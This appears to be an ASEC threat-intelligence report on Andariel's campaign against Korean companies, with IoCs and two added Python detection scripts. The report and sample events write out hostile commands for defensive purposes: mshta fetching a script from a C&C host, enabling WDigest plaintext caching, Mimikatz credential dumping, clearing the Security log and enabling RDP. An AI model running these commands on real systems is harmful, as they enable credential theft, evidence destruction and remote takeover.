AhnLab SEcurity intelligence Center (ASEC) recently discovered that the Andariel group is continuing its attacks on Korean companies. Notably, MeshAgent installations were found in some of the cases. Threat actors often abuse MeshAgent, along with other similar remote management tools, because it offers a wide range of remote control features.
The Andariel group exploited Korean asset management solutions to install malware such as AndarLoader and ModeLoader, both of which were used in earlier cases. Starting with Innorix Agent, the group has continually exploited Korean asset management solutions to distribute its malware during the lateral movement phase [1] [2].
1. AndarLoader
The ASEC team previously introduced AndarLoader in the blog article “Analysis of Andariel’s New Attack Activities” [3]. AndarLoader resembles Andardoor, which was found in the attack cases that exploited Innorix Agent, but unlike Andardoor, which implements most of its backdoor features (executing commands received from the C&C server) in the binary itself, AndarLoader is a downloader that fetches executable data such as a .NET assembly and runs it in memory.
| Command | Feature |
| --- | --- |
| alibaba | Run downloaded .NET assembly |
|  | Run downloaded .NET method |
| exit | Terminate |
| vanish | Self-delete and terminate |

Table 1. AndarLoader’s command list
Unlike the earlier variant, which was obfuscated with the Dotfuscator tool, the AndarLoader found this time was obfuscated using KoiVM. Because the strings it uses are decrypted at runtime, the same strings seen in earlier AndarLoader samples can still be recovered. Note that the current AndarLoader uses the “sslClient” string when connecting to the C&C server, just like the AndarLoader found in previous attacks.
2. MeshAgent
MeshAgent can collect the basic system information required for remote management and provides features such as power and account management, chat and message pop-ups, file upload and download, and command execution. It also provides web-based remote desktop features, including RDP and VNC. Users normally install this tool to access and manage their own systems remotely, but the same features are convenient for threat actors to abuse.
There have been actual cases in which threat actors used MeshAgent to remotely control their victims’ screens [4]. This is the first case in which the Andariel group has been observed using MeshAgent; it was downloaded from an external source under the name “fav.ico”.
The MeshAgent binary itself was not collected, but because the MeshAgent server was still active at the time of analysis, the team was able to identify its C&C server (listed under C&C URL in the IoC section below).
3. ModeLoader
ModeLoader is a JavaScript malware that the Andariel group has used for a long time. Instead of being written to disk as a file, it is downloaded from an external server via Mshta and executed. A previous ASEC blog post showed this behavior as recorded in an ASD log.
The threat actors mainly abuse asset management solutions to execute an Mshta command that downloads ModeLoader. When that command is run, the Mshta process downloads and executes ModeLoader, which then periodically attempts to communicate with its C&C server.
ModeLoader is written in JavaScript and obfuscated, but its functionality is simple. It periodically connects to the C&C server (modeRead.php), receives Base64-encoded commands, executes them, and sends the results back to the C&C server (modeWrite.php).
The threat actors appear to have used ModeLoader to install additional malware from external sources. Using the commands below, AndarLoader was installed as “SVPNClientW.exe” in %SystemDirectory% and executed.
> cmd.exe /c tasklist
> cmd.exe /c c:\windows\system32\SVPN*
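The polling behavior described above (regular requests to modeRead.php, results returned to modeWrite.php) is something a defender can hunt for in web proxy logs. The following Python script is an added example and is not code from the ASEC report or from ModeLoader itself: it keeps only requests to the ModeLoader-specific paths from the IoC list, measures how regular each client's modeRead.php polling is, and counts how many results the client sent to modeWrite.php. The log line format, the sample lines, the source IPs and the thresholds are constructed for the example; decode_task reproduces the Base64 step of the protocol and tolerates padding stripped by a proxy.

```python
import base64
import statistics
from collections import defaultdict
from datetime import datetime

# Paths specific to the ModeLoader C&C (from the IoC list); the generic
# index.php / view.php are left out because they would match ordinary traffic.
MODELOADER_PATHS = {"moderead.php", "modewrite.php", "modeview.php"}

# Constructed proxy log lines for this example (not real traffic):
# "<timestamp> <src_ip> <method> <host> <path> <status>"
SAMPLE_LOG = """
2024-03-01T10:00:00 10.0.0.5 GET www.mssrv.kro.kr /modeRead.php 200
2024-03-01T10:00:30 10.0.0.9 GET intranet.example /index.php 200
2024-03-01T10:01:02 10.0.0.5 GET www.mssrv.kro.kr /modeRead.php 200
2024-03-01T10:02:01 10.0.0.5 GET www.mssrv.kro.kr /modeRead.php 200
2024-03-01T10:02:05 10.0.0.5 POST www.mssrv.kro.kr /modeWrite.php 200
2024-03-01T10:03:00 10.0.0.5 GET www.mssrv.kro.kr /modeRead.php 200
2024-03-01T10:03:30 10.0.0.7 GET www.mssrv.kro.kr /modeRead.php 404
2024-03-01T10:04:01 10.0.0.5 GET www.mssrv.kro.kr /modeRead.php 200
2024-03-01T10:05:00 10.0.0.9 GET intranet.example /view.php 200
""".strip().splitlines()


def parse_line(line):
    """Split one constructed log line into (timestamp, src, method, host, path, status)."""
    ts, src, method, host, path, status = line.split()
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S"), src, method, host.lower(), path, int(status)


def find_beacons(lines, min_polls=4, max_jitter=0.2):
    """Return (src, host) pairs that poll modeRead.php at a regular interval.

    jitter = population std-dev of the gaps between polls / mean gap; a plain
    sleep loop with no randomisation gives a value close to 0.
    """
    polls = defaultdict(list)   # (src, host) -> timestamps of modeRead.php requests
    writes = defaultdict(int)   # (src, host) -> number of modeWrite.php requests
    for line in lines:
        ts, src, method, host, path, _ = parse_line(line)
        name = path.rsplit("/", 1)[-1].lower()
        if name not in MODELOADER_PATHS:
            continue
        key = (src, host)
        if name == "moderead.php":
            polls[key].append(ts)
        elif name == "modewrite.php":
            writes[key] += 1

    findings = []
    for key, times in polls.items():
        if len(times) < min_polls:      # too few samples to judge regularity
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        jitter = statistics.pstdev(gaps) / mean if mean else 0.0
        if jitter <= max_jitter:
            findings.append({
                "src": key[0], "host": key[1], "polls": len(times),
                "interval_s": round(mean), "jitter": round(jitter, 3),
                "result_posts": writes.get(key, 0),
            })
    return findings


def decode_task(body):
    """Decode a Base64 task body as the implant must; tolerate stripped '=' padding."""
    body = body.strip()
    body += "=" * (-len(body) % 4)
    return base64.b64decode(body).decode("utf-8", errors="replace")


if __name__ == "__main__":
    for f in find_beacons(SAMPLE_LOG):
        print(f"{f['src']} -> {f['host']}: {f['polls']} polls every ~{f['interval_s']}s "
              f"(jitter {f['jitter']}), {f['result_posts']} result post(s)")
    print(decode_task("Y21kLmV4ZSAvYyB0YXNrbGlzdA"))   # padding deliberately missing
```

Only 10.0.0.5 is reported: it polled five times at roughly one-minute intervals and posted one result, whereas 10.0.0.7 touched modeRead.php once and falls under the minimum sample count. In production the thresholds should be tuned against the observed sleep time of the sample, and the path match should be combined with the known C&C hosts rather than used on its own.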
4. Other Malware Attack Cases
After using backdoors such as AndarLoader and ModeLoader to take control of the infected systems, the threat actors installed Mimikatz and attempted to steal the credentials stored on them. Because recent Windows versions (Windows 8.1 / Server 2012 R2 and later, or earlier versions with KB2871997) no longer keep WDigest plaintext passwords in memory by default, a command setting the UseLogonCredential value (under HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest, DWORD 1) was found at the same time; note that this only affects logons that occur after the change, so the attacker still has to wait for a user to authenticate. The threat actors also used AndarLoader to execute the “wevtutil cl security” command, which clears the Security event log of the infected system (the clearing itself is recorded as event ID 1102 in the newly emptied log).
A characteristic shared by the attacks in this campaign is that a keylogger is found alongside them. The malware provides not only keylogging but also clipboard logging, and it records the captured keystrokes and clipboard data in “C:\Users\Public\game.db”.
As the Kimsuky group has also done, the Andariel group installed a backdoor, took control of the infected systems, and then performed additional tasks to remotely control their victims’ screens. To establish remote control they installed MeshAgent, as described above, but in some cases they also used RDP, and the command that enables the RDP service was found as well. Although the files were not recovered, the threat actors are likely using fRPC (the client component of the frp reverse proxy) to reach infected systems on private networks via RDP.
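The post-exploitation steps described in this section (Mimikatz together with the UseLogonCredential change, the wevtutil log clearing, and enabling RDP) all leave distinctive process command lines, as does the Mshta download of ModeLoader from section 3. The following Python script is an added example, not code from the ASEC report: it applies a small rule set to Sysmon Event ID 1 / Security 4688 style records (parent image, image, command line) and reports hosts on which several rules fire together, which is the chain the article describes. The ProcEvent record, host names and sample events are constructed for the example; the registry paths, wevtutil syntax and Mimikatz module names are the real ones.

```python
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1 / Security 4688 style); constructed shape."""
    host: str
    parent_image: str
    image: str
    cmdline: str


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def wdigest_plaintext_enabled(e):
    # reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
    #   /v UseLogonCredential /t REG_DWORD /d 1   (or Set-ItemProperty ... -Value 1)
    # re-enables WDigest caching of plaintext passwords for later Mimikatz use.
    c = e.cmdline.lower()
    return ("wdigest" in c and "uselogoncredential" in c
            and re.search(r"(?:/d|-value)\s+0*1\b", c) is not None)


def security_log_cleared(e):
    # "wevtutil cl Security" / "wevtutil clear-log Security"; a query ("qe") does not match.
    return (_basename(e.image) == "wevtutil.exe"
            and re.search(r"\b(?:cl|clear-log)\s+security\b", e.cmdline, re.I) is not None)


def rdp_enabled_via_registry(e):
    # HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server, fDenyTSConnections = 0 enables RDP.
    c = e.cmdline.lower()
    return ("fdenytsconnections" in c
            and re.search(r"(?:/d|-value)\s+0*0\b", c) is not None)


def mshta_remote_script(e):
    # Mshta fetching a script from a URL is how ModeLoader is delivered.
    return _basename(e.image) == "mshta.exe" and re.search(r"https?://", e.cmdline, re.I) is not None


def mimikatz_command(e):
    # Module syntax survives renaming the binary (the report saw it as mimi.exe).
    c = e.cmdline.lower()
    return "sekurlsa::" in c or "lsadump::" in c


RULES = [
    ("wdigest_plaintext_enabled", wdigest_plaintext_enabled),
    ("security_log_cleared", security_log_cleared),
    ("rdp_enabled_via_registry", rdp_enabled_via_registry),
    ("mshta_remote_script", mshta_remote_script),
    ("mimikatz_command", mimikatz_command),
]


def detect(events):
    """Return (host, rule_name, cmdline) for every event that matches a rule."""
    return [(e.host, name, e.cmdline) for e in events for name, rule in RULES if rule(e)]


def chained_hosts(events, min_rules=2):
    """Hosts on which at least `min_rules` distinct rules fired: the post-exploitation chain."""
    seen = defaultdict(set)
    for host, name, _ in detect(events):
        seen[host].add(name)
    return {h for h, names in seen.items() if len(names) >= min_rules}


# Constructed sample telemetry (not from the ASEC report): ws01 follows the article's
# chain, ws02 is an administrator doing look-alike but benign things.
SAMPLE_EVENTS = [
    ProcEvent("ws01", r"C:\AssetMgmt\agent.exe", r"C:\Windows\System32\mshta.exe",
              "mshta http://www.ipservice.kro.kr/index.php"),
    ProcEvent("ws01", r"C:\Windows\System32\SVPNClientW.exe", r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c tasklist"),
    ProcEvent("ws01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\reg.exe",
              r"reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest "
              r"/v UseLogonCredential /t REG_DWORD /d 1 /f"),
    ProcEvent("ws01", r"C:\Windows\System32\cmd.exe", r"C:\Users\user\mimi.exe",
              'mimi.exe "privilege::debug" "sekurlsa::logonpasswords" exit'),
    ProcEvent("ws01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wevtutil.exe",
              "wevtutil cl security"),
    ProcEvent("ws01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\reg.exe",
              r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" '
              r"/v fDenyTSConnections /t REG_DWORD /d 0 /f"),
    ProcEvent("ws02", r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c tasklist"),
    ProcEvent("ws02", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wevtutil.exe",
              "wevtutil qe Security /c:5 /rd:true /f:text"),
    ProcEvent("ws02", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\reg.exe",
              r"reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest "
              r"/v UseLogonCredential"),
]

if __name__ == "__main__":
    for host, name, cmd in detect(SAMPLE_EVENTS):
        print(f"[{host}] {name}: {cmd}")
    print("chained:", chained_hosts(SAMPLE_EVENTS))
```

All five rules fire on ws01 and none on ws02, so only ws01 is reported as chained. Each rule on its own is a weak signal (administrators do enable RDP and clear logs); requiring two or more distinct rules on the same host is what turns them into a credible indicator of this campaign's tradecraft. Registry changes made through a driver or direct API call will not appear as command lines, so pair these rules with registry-modification telemetry (Sysmon Event ID 13) and Security event 1102.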
5. Conclusion
Along with Kimsuky and Lazarus, the Andariel group is one of the threat actor groups most actively targeting South Korea. In its early days the group mainly attacked to obtain security-related information, but its attacks later also aimed at financial gain. The Andariel group is known to gain initial access through spear phishing, watering hole attacks, and the exploitation of software vulnerabilities. There have also been cases, such as those described here, in which the group abused software already installed on target systems to distribute its malware.
Users must take extra caution when opening e-mail attachments from unknown senders or running executable files from unidentified websites. Corporate security administrators must strengthen monitoring of asset management solutions and apply updates promptly when security vulnerabilities are found in such software. Users should also apply the latest patches for the OS and programs such as web browsers, and update V3 to the latest version, to prevent malware infections in advance.
File Detection
– Backdoor/JS.ModeLoader.SC197310 (2024.03.01.00)
– Trojan/Win.Generic.C5384741 (2023.02.19.01)
– Trojan/Win.KeyLogger.C5542383 (2023.11.16.01)
– Trojan/Win32.RL_Mimikatz.R366782 (2021.02.18.01)
Behavior Detection
– CredentialAceess/MDP.Mimikatz.M4367
IoC
MD5
– a714b928bbc7cd480fed85e379966f95 : AndarLoader (%SystemDirectory%\SVPNClientW.exe)
– 4f1b1124e34894398aa423200a8ab894 : KeyLogger (%USERPROFILE%\documents\kerberos.tmp, %USERPROFILE%\kl.exe, %SystemDirectory%\dllhostsvc.exe)
– 2c69c4786ce663e58a3cc093c6d5b530 : ModeLoader
– 29efd64dd3c7fe1e2b022b7ad73a1ba5 : Mimikatz (%USERPROFILE%\mimi.exe)
C&C URL
– privacy.hopto[.]org:443 : AndarLoader
– privatemake.bounceme[.]net:443 : AndarLoader
– 84.38.129[.]21 : MeshAgent
– hxxp://www.ipservice.kro[.]kr/index.php : ModeLoader
– hxxp://www.ipservice.kro[.]kr/view.php : ModeLoader
– hxxp://www.ipservice.kro[.]kr/modeRead.php : ModeLoader
– hxxp://panda.ourhome.o-r[.]kr/view.php : ModeLoader
– hxxp://panda.ourhome.o-r[.]kr/modeRead.php : ModeLoader
– hxxp://panda.ourhome.o-r[.]kr/modeView.php : ModeLoader
– hxxp://www.mssrv.kro[.]kr/view.php : ModeLoader
– hxxp://www.mssrv.kro[.]kr/modeView.php : ModeLoader
– hxxp://www.mssrv.kro[.]kr/modeRead.php : ModeLoader
– hxxp://www.mssrv.kro[.]kr/modeWrite.php : ModeLoader
Source: https://asec.ahnlab.com/en/63192/